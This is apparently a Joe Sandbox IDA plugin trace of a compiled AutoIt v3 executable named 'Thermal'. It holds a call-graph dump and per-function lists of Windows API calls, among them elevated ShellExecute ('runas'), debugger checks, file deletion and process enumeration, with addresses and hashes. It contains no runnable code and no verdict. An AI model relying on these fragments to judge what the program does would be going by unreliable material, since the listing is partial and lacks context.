100305 7c08bb 100307 784a2f 84 API calls 100305->100307 100309 7c08c2 100307->100309 100311 784ade 3 API calls 100309->100311 100314 7c08ca 100311->100314 100312 784a14 100313 784a20 100312->100313 100312->100314 100316 784a2f 84 API calls 100313->100316 100519 784ab2 100314->100519 100532 784b77 100483->100532 100486 784b50 100487 7849d4 100486->100487 100488 784b60 FreeLibrary 100486->100488 100490 79547b 100487->100490 100488->100487 100489 784b77 2 API calls 100489->100486 100536 795490 100490->100536 100492 7849e1 100492->100304 100492->100305 100617 784baa 100493->100617 100496 784a05 100500 7848b0 100496->100500 100497 784b15 FreeLibrary 100497->100496 100498 784baa 2 API calls 100499 784b03 100498->100499 100499->100496 100499->100497 100501 790fe6 Mailbox 59 API calls 100500->100501 100502 7848c5 100501->100502 100503 78433f 59 API calls 100502->100503 100504 7848d1 _memmove 100503->100504 100505 78490c 100504->100505 100507 7c080a 100504->100507 100508 784a6e 69 API calls 100505->100508 100506 7c0817 100627 7d9f5e 95 API calls 100506->100627 100507->100506 100626 7d9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100507->100626 100518 784915 100508->100518 100511 784ab2 74 API calls 100511->100518 100512 7c0859 100621 784a8c 100512->100621 100516 7849a0 100516->100312 100517 784a8c 85 API calls 100517->100518 100518->100511 100518->100512 100518->100516 100518->100517 100520 7c0945 100519->100520 100521 784ac4 100519->100521 100733 795802 100521->100733 100524 7d96c4 100858 7d951a 100524->100858 100526 7d96da 100533 784b44 100532->100533 100534 784b80 LoadLibraryA 100532->100534 100533->100486 100533->100489 100534->100533 100535 784b91 GetProcAddress 100534->100535 100535->100533 100537 79549c __freefls@4 100536->100537 100538 7954af 100537->100538 100541 7954e0 100537->100541 100585 798d58 58 API calls __getptd_noexit 100538->100585 100540 7954b4 100586 798fe6 9 API calls __controlfp_s 100540->100586 100555 7a0718 100541->100555 100544 7954e5 100545 7954fb 100544->100545 100546 7954ee 100544->100546 100548 795525 100545->100548 100549 795505 100545->100549 100587 798d58 58 API calls __getptd_noexit 100546->100587 100570 7a0837 100548->100570 100588 798d58 58 API calls __getptd_noexit 100549->100588 100552 7954bf @_EH4_CallFilterFunc@8 __freefls@4 100552->100492 100556 7a0724 __freefls@4 100555->100556 100557 799e3b __lock 58 API calls 100556->100557 100568 7a0732 100557->100568 100558 7a07a6 100590 7a082e 100558->100590 100559 7a07ad 100595 798a4d 58 API calls 2 library calls 100559->100595 100562 7a07b4 100562->100558 100596 79a05b InitializeCriticalSectionAndSpinCount 100562->100596 100563 7a0823 __freefls@4 100563->100544 100565 799ec3 __mtinitlocknum 58 API calls 100565->100568 100567 7a07da EnterCriticalSection 100567->100558 100568->100558 100568->100559 100568->100565 100593 796e7d 59 API calls __lock 100568->100593 100594 796ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100568->100594 100571 7a0857 __wopenfile 100570->100571 100572 7a0871 100571->100572 100584 7a0a2c 100571->100584 100603 7939fb 60 API calls 2 library calls 100571->100603 100601 798d58 58 API calls __getptd_noexit 100572->100601 100574 7a0876 100602 798fe6 9 API calls __controlfp_s 100574->100602 100576 795530 100589 795552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100576->100589 100577 7a0a8f 100598 7a87d1 100577->100598 100580 7a0a25 100580->100584 100604 7939fb 60 API calls 2 library calls 100580->100604 100582 7a0a44 100582->100584 100605 7939fb 60 API calls 2 library calls 100582->100605 100584->100572 100584->100577 100585->100540 100586->100552 100587->100552 100588->100552 100589->100552 100597 799fa5 LeaveCriticalSection 100590->100597 100592 7a0835 100592->100563 100593->100568 100594->100568 100595->100562 100596->100567 100597->100592 100606 7a7fb5 100598->100606 100601->100574 100602->100576 100603->100580 100604->100582 100605->100584 100608 7a7fc1 __freefls@4 100606->100608 100607 7a7fd7 100609 798d58 __controlfp_s 58 API calls 100607->100609 100608->100607 100610 7a800d 100608->100610 100611 7a7fdc 100609->100611 100612 7a807e __wsopen_nolock 109 API calls 100610->100612 100613 798fe6 __controlfp_s 9 API calls 100611->100613 100614 7a8029 100612->100614 100615 7a8052 __wsopen_helper LeaveCriticalSection 100614->100615 100618 784af7 100617->100618 100619 784bb3 LoadLibraryA 100617->100619 100618->100498 100618->100499 100619->100618 100620 784bc4 GetProcAddress 100619->100620 100620->100618 100622 784a9b 100621->100622 100623 7c0923 100621->100623 100628 795a6d 100622->100628 100626->100506 100627->100518 100736 79581d 100733->100736 100735 784ad5 100735->100524 100737 795829 __freefls@4 100736->100737 100738 79586c 100737->100738 100739 79583f _memset 100737->100739 100741 795864 __freefls@4 100737->100741 100740 796e3e __lock_file 59 API calls 100738->100740 100763 798d58 58 API calls __getptd_noexit 100739->100763 100742 795872 100740->100742 100741->100735 100749 79563d 100742->100749 100745 795859 100764 798fe6 9 API calls __controlfp_s 100745->100764 100750 795673 100749->100750 100753 795658 _memset 100749->100753 100765 7958a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100750->100765 100751 795663 100854 798d58 58 API calls __getptd_noexit 100751->100854 100753->100750 100753->100751 100754 7956b3 100753->100754 100754->100750 100757 7957c4 _memset 100754->100757 100759 794906 __flsbuf 58 API calls 100754->100759 100766 7a108b 100754->100766 100834 7a0dd7 100754->100834 100856 7a0ef8 58 API calls 3 library calls 100754->100856 100857 798d58 58 API calls __getptd_noexit 100757->100857 100759->100754 100761 795668 100763->100745 100764->100741 100765->100741 100767 7a10ac 100766->100767 100768 7a10c3 100766->100768 100770 7a17fb 100768->100770 100835 7a0de2 100834->100835 100840 7a0df7 100834->100840 100854->100761 100856->100754 100857->100761 100861 79542a GetSystemTimeAsFileTime 100858->100861 100860 7d9529 100860->100526 100862 795458 __aulldiv 100861->100862 100862->100860 101039 779a6c 101042 77829c 101039->101042 101041 779a78 101043 778308 101042->101043 101044 7782b4 101042->101044 101048 778331 101043->101048 101052 7da48d 89 API calls 4 library calls 101043->101052 101044->101043 101045 7753b0 299 API calls 101044->101045 101049 7782eb 101045->101049 101047 7b0ed8 101047->101047 101048->101041 101049->101048 101051 77523c 59 API calls 101049->101051 101051->101043 101052->101047 101053 784d83 101054 784dba 101053->101054 101055 784dd8 101054->101055 101056 784e37 101054->101056 101092 784e35 101054->101092 101060 784ead PostQuitMessage 101055->101060 101061 784de5 101055->101061 101058 784e3d 101056->101058 101059 7c09c2 101056->101059 101057 784e1a DefWindowProcW 101095 784e28 101057->101095 101062 784e42 101058->101062 101063 784e65 SetTimer RegisterWindowMessageW 101058->101063 101108 77c460 10 API calls Mailbox 101059->101108 101060->101095 101064 784df0 101061->101064 101065 7c0a35 101061->101065 101067 784e49 KillTimer 101062->101067 101068 7c0965 101062->101068 101069 784e8e CreatePopupMenu 101063->101069 101063->101095 101070 784df8 101064->101070 101071 784eb7 101064->101071 101111 7d2cce 97 API calls _memset 101065->101111 101077 785ac3 Shell_NotifyIconW 101067->101077 101075 7c099e MoveWindow 101068->101075 101076 7c096a 101068->101076 101069->101095 101078 7c0a1a 101070->101078 101079 784e03 101070->101079 101098 785b29 101071->101098 101073 7c09e9 101109 77c483 299 API calls Mailbox 101073->101109 101075->101095 101082 7c098d SetFocus 101076->101082 101083 7c096e 101076->101083 101084 784e5c 101077->101084 101078->101057 101110 7c8854 59 API calls Mailbox 101078->101110 101085 784e9b 101079->101085 101090 784e0e 101079->101090 101080 7c0a47 101080->101057 101080->101095 101082->101095 101086 7c0977 101083->101086 101083->101090 101105 7734e4 DeleteObject DestroyWindow Mailbox 101084->101105 101106 785bd7 107 API calls _memset 101085->101106 101107 77c460 10 API calls Mailbox 101086->101107 101090->101057 101094 785ac3 Shell_NotifyIconW 101090->101094 101092->101057 101093 784eab 101093->101095 101096 7c0a0e 101094->101096 101097 7859d3 94 API calls 101096->101097 101097->101092 101099 785b40 _memset 101098->101099 101100 785bc2 101098->101100 101101 7856f8 87 API calls 101099->101101 101100->101095 101104 785b67 101101->101104 101102 785bab KillTimer SetTimer 101102->101100 101103 7c0d6e Shell_NotifyIconW 101103->101102 101104->101102 101104->101103 101105->101095 101106->101093 101107->101095 101108->101073 101109->101090 101110->101092 101111->101080 101112 779a88 101115 7786e0 101112->101115 101116 7786fd 101115->101116 101117 7b0ff8 101116->101117 101118 7b0fad 101116->101118 101139 778724 101116->101139 101150 7eaad0 299 API calls __cinit 101117->101150 101121 7b0fb5 101118->101121 101124 7b0fc2 101118->101124 101118->101139 101119 775278 59 API calls 101119->101139 101148 7eb0e4 299 API calls 101121->101148 101123 792f70 __cinit 67 API calls 101123->101139 101140 77898d 101124->101140 101149 7eb58c 299 API calls 3 library calls 101124->101149 101126 7b1289 101126->101126 101128 773f42 68 API calls 101128->101139 101129 7b11af 101153 7eae3b 89 API calls 101129->101153 101132 778a17 101133 7739be 68 API calls 101133->101139 101138 773c30 68 API calls 101138->101139 101139->101119 101139->101123 101139->101128 101139->101129 101139->101132 101139->101133 101139->101138 101139->101140 101141 7753b0 299 API calls 101139->101141 101142 781c9c 59 API calls 101139->101142 101144 773938 68 API calls 101139->101144 101145 77855e 299 API calls 101139->101145 101146 7784e2 89 API calls 101139->101146 101147 77835f 299 API calls 101139->101147 101151 77523c 59 API calls 101139->101151 101152 7c73ab 59 API calls 101139->101152 101140->101132 101154 7da48d 89 API calls 4 library calls 101140->101154 101141->101139 101142->101139 101144->101139 101145->101139 101146->101139 101147->101139 101148->101124 101149->101140 101150->101139 101151->101139 101152->101139 101153->101140 101154->101126
                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078526C
                                                • IsDebuggerPresent.KERNEL32 ref: 0078527E
                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 007852E6
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                  • Part of subcall function 0077BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0077BC07
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00785366
                                                • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 007C0B2E
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0B66
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00826D10), ref: 007C0BE9
                                                • ShellExecuteW.SHELL32(00000000), ref: 007C0BF0
                                                  • Part of subcall function 0078514C: GetSysColorBrush.USER32(0000000F), ref: 00785156
                                                  • Part of subcall function 0078514C: LoadCursorW.USER32(00000000,00007F00), ref: 00785165
                                                  • Part of subcall function 0078514C: LoadIconW.USER32(00000063), ref: 0078517C
                                                  • Part of subcall function 0078514C: LoadIconW.USER32(000000A4), ref: 0078518E
                                                  • Part of subcall function 0078514C: LoadIconW.USER32(000000A2), ref: 007851A0
                                                  • Part of subcall function 0078514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007851C6
                                                  • Part of subcall function 0078514C: RegisterClassExW.USER32(?), ref: 0078521C
                                                  • Part of subcall function 007850DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00785109
                                                  • Part of subcall function 007850DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0078512A
                                                  • Part of subcall function 007850DB: ShowWindow.USER32(00000000), ref: 0078513E
                                                  • Part of subcall function 007850DB: ShowWindow.USER32(00000000), ref: 00785147
                                                  • Part of subcall function 007859D3: _memset.LIBCMT ref: 007859F9
                                                  • Part of subcall function 007859D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00785A9E
                                                Strings
                                                • AutoIt, xrefs: 007C0B23
                                                • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 007C0B28
                                                • runas, xrefs: 007C0BE4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                • API String ID: 529118366-2030392706
                                                • Opcode ID: cdd246e6cf89bad888368dafd6ff7092a9e2069d9e82018a09ea6906dbe16e9e
                                                • Instruction ID: 61dd8488185bbfc0ae55466bd263fc3d1c5def3d208957b4d1b7e0918c93dba9
                                                • Opcode Fuzzy Hash: cdd246e6cf89bad888368dafd6ff7092a9e2069d9e82018a09ea6906dbe16e9e
                                                • Instruction Fuzzy Hash: 6F514A7098424CEACF21FBB4DC0AEEE7B79FF45340F1040A9F452A2262CA7C9945CB61
                                                APIs
                                                  • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                  • Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D3D96
                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007D3E3E
                                                • MoveFileW.KERNEL32(?,?), ref: 007D3E51
                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007D3E6E
                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007D3E90
                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007D3EAC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 4002782344-1173974218
                                                • Opcode ID: 083762c4b07bdf724bcb0fe4c63a9156a256e91b806b4be42fe9ddaeea2841ec
                                                • Instruction ID: b000644190952bd17356e2caa7984847fff811a5fc2eb415d45e646bded8a1e7
                                                • Opcode Fuzzy Hash: 083762c4b07bdf724bcb0fe4c63a9156a256e91b806b4be42fe9ddaeea2841ec
                                                • Instruction Fuzzy Hash: 5A51843184114DEACF15FBA0D99A9EDB779AF10301F644166E441B3291DF396F0ACB61
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00785D40
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                • GetCurrentProcess.KERNEL32(?,00800A18,00000000,00000000,?), ref: 00785E07
                                                • IsWow64Process.KERNEL32(00000000), ref: 00785E0E
                                                • GetNativeSystemInfo.KERNEL32(00000000), ref: 00785E54
                                                • FreeLibrary.KERNEL32(00000000), ref: 00785E5F
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00785E90
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00785E9C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                • String ID:
                                                • API String ID: 1986165174-0
                                                • Opcode ID: fe7c8f82708239f7d55e067a4af9d689c6da5131752bc0c1ae25b99226b64b18
                                                • Instruction ID: 147d5a72fddc3018f3d158741b0eb6658741c73d72dc6ad6381e26a54988cb51
                                                • Opcode Fuzzy Hash: fe7c8f82708239f7d55e067a4af9d689c6da5131752bc0c1ae25b99226b64b18
                                                • Instruction Fuzzy Hash: E791B631589BC4DEC731DB7884505ABFFE5BF2A300F884A9ED0C797A42D238A548D769
                                                APIs
                                                  • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                  • Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D407C
                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 007D40CC
                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007D40DD
                                                • FindClose.KERNEL32(00000000), ref: 007D40F4
                                                • FindClose.KERNEL32(00000000), ref: 007D40FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 2649000838-1173974218
                                                • Opcode ID: 24a0888bffd925f00c622be168cfa2b49c9acf2489493fc55e0af21138ae06a1
                                                • Instruction ID: 76ed7656cd91326057f129d55bd1a7478e51231739a255cfb2830c6853eb18b9
                                                • Opcode Fuzzy Hash: 24a0888bffd925f00c622be168cfa2b49c9acf2489493fc55e0af21138ae06a1
                                                • Instruction Fuzzy Hash: 33316331048385DFC701FB60D8999AFB7ECBE95304F444A5EF5E582291DB39D909CBA2
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 007D416D
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 007D417B
                                                • Process32NextW.KERNEL32(00000000,?), ref: 007D419B
                                                • CloseHandle.KERNEL32(00000000), ref: 007D4245
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 395f1cc134522c221ec82394438973afef38d1a42c875bbffd49cbdab372cff3
                                                • Instruction ID: c57331a14f5e08afee9f31eba3314cd102b996f49715970149f9a8743eddf177
                                                • Opcode Fuzzy Hash: 395f1cc134522c221ec82394438973afef38d1a42c875bbffd49cbdab372cff3
                                                • Instruction Fuzzy Hash: 64314D71148341DBD304EF50E889AAEBBF8BF95350F40052EF585822A1EB75AA49CB92
                                                APIs
                                                  • Part of subcall function 00783740: CharUpperBuffW.USER32(?,008371DC,00000000,?,00000000,008371DC,?,007753A5,?,?,?,?), ref: 0078375D
                                                • _memmove.LIBCMT ref: 0077B68A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper_memmove
                                                • String ID:
                                                • API String ID: 2819905725-0
                                                • Opcode ID: e871c021c1db2d57b9cdf9cd3e1fcf57b50046189ac7a71ed2deee7d67f71447
                                                • Instruction ID: b02512a2b423c2efd75704f40639f36570d0554f1009476dffd5d349046a49c2
                                                • Opcode Fuzzy Hash: e871c021c1db2d57b9cdf9cd3e1fcf57b50046189ac7a71ed2deee7d67f71447
                                                • Instruction Fuzzy Hash: 82A26870608741DFDB20DF28C484B6AB7E1BF88344F14895DE89A8B361D779ED85CB92
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,007BFC86), ref: 007D495A
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D496B
                                                • FindClose.KERNEL32(00000000), ref: 007D497B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 846fab9835418e094a279fe3e001c162fbb901723817b9cf2f134498568695fc
                                                • Instruction ID: 134cdb7df7a19620caa099a50b949946d33bd7e1f8b84dad8fb6a7cf48c022e7
                                                • Opcode Fuzzy Hash: 846fab9835418e094a279fe3e001c162fbb901723817b9cf2f134498568695fc
                                                • Instruction Fuzzy Hash: 5CE0DF31810505ABC3206738EC0D9EA776CAF06339F200706F835C22E0EB74A9448AD6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba3eeb76c46059dc31c3934b2b72bdf87b7043a4532cfb6cce1dce4882c2e598
                                                • Instruction ID: beeb02582df3799879c8bd63bbfc23c09a4c139c70e21ae3d878d0999391f899
                                                • Opcode Fuzzy Hash: ba3eeb76c46059dc31c3934b2b72bdf87b7043a4532cfb6cce1dce4882c2e598
                                                • Instruction Fuzzy Hash: 5522BF70A0121ADFDF14DF58C484BAEB7B0FF45340F14C569EA5AAB351E378A981CB91
                                                APIs
                                                • timeGetTime.WINMM ref: 0077BF57
                                                  • Part of subcall function 007752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
                                                • Sleep.KERNEL32(0000000A,?,?), ref: 007B36B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePeekSleepTimetime
                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                • API String ID: 1792118007-922114024
                                                • Opcode ID: 44b65cc0518dcf7b295acb2fd74f429233c9be5aefc0e83f6ab6970340330fa7
                                                • Instruction ID: fa225c4f259c7101c51d0130f10d0122292357c0f18c6eb6effd553b5b9d87ce
                                                • Opcode Fuzzy Hash: 44b65cc0518dcf7b295acb2fd74f429233c9be5aefc0e83f6ab6970340330fa7
                                                • Instruction Fuzzy Hash: 10C2D470608341DFDB24DF24C848BAAB7E5FF84344F14891DF58A972A1DB79E984CB92
                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773444
                                                • RegisterClassExW.USER32(00000030), ref: 0077346E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
                                                • InitCommonControlsEx.COMCTL32(?), ref: 0077349C
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
                                                • LoadIconW.USER32(000000A9), ref: 007734C2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: e5764a627c1f279ec7bb6902646a3a1e8c6367667cf93375295197c6f62aa451
                                                • Instruction ID: dee2a5e093b451685737f166ca2b4923e7535ac82242a2d80646c2d71a18ccb2
                                                • Opcode Fuzzy Hash: e5764a627c1f279ec7bb6902646a3a1e8c6367667cf93375295197c6f62aa451
                                                • Instruction Fuzzy Hash: 0C314AB1904309AFDB508FA4DC89BDDBBF0FF08310F10452AE555E62A0D7BA5645CF90
                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00773444
